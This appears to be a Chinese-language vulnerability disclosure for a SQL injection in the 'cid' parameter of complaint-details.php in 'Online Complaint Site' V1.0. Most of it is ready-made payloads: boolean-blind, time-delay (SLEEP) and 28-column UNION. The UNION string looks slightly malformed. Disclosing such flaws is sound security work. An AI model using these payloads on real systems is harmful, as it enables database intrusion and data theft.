关键漏洞信息 受影响产品 Online Complaint Site 漏洞类型 SQL Injection 受影响文件 /cms/users/complaint-details.php?cid=1 版本 V1.0 漏洞详情 参数: cid (GET) 类型: 基于布尔的盲注 - WHERE 或 HAVING 子句 有效载荷: cid=-1 AND ASCII(~(SELECT @s:=GROUP_CONCAT(version()) FROM information_schema.tables LIMIT 0,1))>0 类型: 时间延迟注入 标题: MySQL >= 5.0 AND 时间延迟注入(查询,错误) 有效载荷: cid=-1 AND SLEEP(5) AND 'aGoy'='aGoy 类型: UNION 查询 标题: 泛型 UNION 查询 (NULL) - 28 列 有效载荷: cid=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL CONCAT(0x7162706a71,0x4b6c44644f77707462636c79627074,0x716a6a7071)-- iXQr `` /cms/users/complaint-details.php?cid=1`文件中存在SQL注入漏洞,攻击者可以通过特定的有效载荷利用该漏洞进行数据泄露或进一步的恶意操作。